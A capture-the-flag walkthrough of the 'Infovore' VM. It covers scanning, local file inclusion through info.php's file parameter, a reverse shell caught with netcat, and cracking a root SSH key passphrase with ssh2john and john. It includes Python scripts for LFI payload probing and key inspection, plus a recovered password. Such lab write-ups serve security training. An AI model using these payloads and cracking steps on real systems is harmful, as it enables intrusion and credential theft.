Infovore Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.20 -vv (all 65535 TCP ports, with service and OS detection).

Only port 80 is open, so we brute-force its paths with dirb http://192.168.1.20 /usr/share/dirb/wordlists/big.txt

Nothing useful turns up, just a fancy landing page, so let's run nikto -h 192.168.1.20

Nikto reports the line "/info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list", which means the file parameter of info.php is being passed to a file include. Searching on that finding, I came across an article about LFI in PHP (linked Here).

So I decided to run a tool I have, LFISuite, against the parameter, and it came back with a result:

You can also test this parameter manually with different LFI payloads, but the tool is much faster and saves time.
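What a manual probe of that file= parameter does, as an added example that is not part of the original walkthrough and is not LFISuite's code: it generates the usual LFI payload variants (traversal, absolute path, null-byte truncation, php://filter base64 wrapper) and classifies each response. The target URL http://192.168.1.20/info.php is taken from the walkthrough; the simulated_include stand-in for the server and the /etc/passwd contents it returns are constructed so the script runs offline, and fetch is injected so the same probe() can be pointed at a real HTTP client.

```python
import base64
import binascii
import posixpath
import re
from urllib.parse import quote, unquote

# A readable /etc/passwd always starts with the root entry.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)


def lfi_payloads(target="/etc/passwd", depth=8):
    """Payload variants to try in the vulnerable parameter."""
    rel = target.lstrip("/")
    trav = "../" * depth
    return [
        trav + rel,            # plain traversal from the web root
        target,                # absolute path, works when include() gets the raw value
        trav + rel + "\x00",   # null-byte truncation, only on PHP < 5.3.4
        "php://filter/convert.base64-encode/resource=" + target,  # read source without executing it
    ]


def decode_filter_output(body):
    """php://filter/convert.base64-encode returns one base64 blob; decode it."""
    m = re.search(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0)).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def classify(payload, body):
    """Return 'lfi', 'lfi-via-filter' or 'no' for one response body."""
    if PASSWD_RE.search(body):
        return "lfi"
    if payload.startswith("php://filter"):
        decoded = decode_filter_output(body)
        if decoded and PASSWD_RE.search(decoded):
            return "lfi-via-filter"
    return "no"


def probe(fetch, base_url="http://192.168.1.20/info.php", param="file"):
    """fetch(url) -> body. Injected so the probe can run against a simulated target."""
    results = {}
    for p in lfi_payloads():
        url = f"{base_url}?{param}={quote(p, safe='/:=')}"
        results[p] = classify(p, fetch(url))
    return results


# --- Constructed stand-in for the target; not captured from the real VM ---
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
FAKE_FS = {"/etc/passwd": FAKE_PASSWD}


def simulated_include(url):
    """Mimics a modern PHP include($_GET['file']) with the web root at /var/www/html."""
    value = unquote(url.split("?file=", 1)[1])
    if "\x00" in value:
        return "Warning: include(): Filename must not contain any null bytes"
    if value.startswith("php://filter/convert.base64-encode/resource="):
        content = FAKE_FS.get(posixpath.normpath(value.split("resource=", 1)[1]))
        if content is None:
            return "Warning: include(): failed to open stream"
        return base64.b64encode(content.encode()).decode()
    path = posixpath.normpath(posixpath.join("/var/www/html", value))
    return FAKE_FS.get(path, "Warning: include(): failed to open stream")


if __name__ == "__main__":
    for payload, verdict in probe(simulated_include).items():
        print(f"{verdict:15} {payload!r}")
```

Against the simulated target the traversal and absolute-path payloads come back as "lfi", the php://filter variant as "lfi-via-filter" after decoding, and the null-byte variant as "no" because modern PHP refuses the path. To run it for real, replace simulated_include with a function that performs the GET and returns the body.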

To turn the LFI into a shell we download this EXPLOIT, edit the lines that need to be changed for this target, and run it:

After changing the required lines we run the script with "python exploit_name 192.168.1.20 80 10" and start a listener on port 4444 (for example nc -lvnp 4444) to catch the connection:

Listing the directory (ls -la, so dotfiles show up) reveals two hidden files, one of them a compressed archive; copy both to /tmp and extract the archive:

The file root is a passphrase-protected private key, so we need to crack its passphrase. Copy the file to your machine and save it as rsd, convert it to a hash with ssh2john, and crack that hash with "john":

The passphrase john recovers is "choclate93". The same string is also root's password, so we "su" to become root:
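Before handing a recovered key to john it is worth confirming that it really is passphrase-protected and which key-derivation it uses, because that decides how fast the crack will be: legacy PEM keys (Proc-Type/DEK-Info headers) derive the cipher key with a single MD5 round, while new-format OpenSSH keys usually use bcrypt. The following Python is an added example, not part of the original walkthrough; the two sample key blocks are constructed fixtures with filler bodies, not the VM's root key, and cracking_plan assumes the ssh2john converter that ships with John the Ripper jumbo.

```python
import base64
import re
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(blob, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(text):
    """Report format, whether a passphrase is set, and the cipher/KDF in use."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        # The blob starts with the cipher name and KDF name as SSH strings.
        cipher, off = _read_string(blob, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(blob, off)
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode()}
    m = re.match(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", header)
    if not m:
        raise ValueError("not a recognised private key")
    encrypted = "Proc-Type: 4,ENCRYPTED" in lines
    dek = next((ln.split(":", 1)[1].strip() for ln in lines if ln.startswith("DEK-Info:")), None)
    return {"format": "pem-" + m.group(1).lower(), "encrypted": encrypted,
            "cipher": dek.split(",")[0] if dek else "none",
            # Legacy PEM derives the key with one MD5 round (OpenSSL EVP_BytesToKey).
            "kdf": "md5-evp_bytestokey" if encrypted else "none"}


def cracking_plan(info):
    """The john workflow that applies, or 'n/a' when there is no passphrase to crack."""
    if not info["encrypted"]:
        return "n/a"
    speed = "slow" if info["kdf"] == "bcrypt" else "fast"
    return f"ssh2john rsd > rsd.hash; john --wordlist=<wordlist> rsd.hash  ({speed} KDF)"


# --- Constructed fixtures; neither is a usable key ---
def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _fake_openssh_key(cipher, kdf):
    """Well-formed openssh-key-v1 header followed by filler bytes."""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(b"\x00" * 24) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""
SAMPLE_BCRYPT = _fake_openssh_key(b"aes256-ctr", b"bcrypt")
SAMPLE_PLAIN = _fake_openssh_key(b"none", b"none")

if __name__ == "__main__":
    for name, key in [("legacy", SAMPLE_LEGACY_PEM), ("bcrypt", SAMPLE_BCRYPT), ("plain", SAMPLE_PLAIN)]:
        info = inspect_private_key(key)
        print(name, info, "->", cracking_plan(info))
```

If the key reports "encrypted": False there is nothing to crack and it can be used directly with ssh -i; a bcrypt KDF means each wordlist candidate costs many bcrypt rounds, so start with a short, targeted wordlist rather than a large one.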
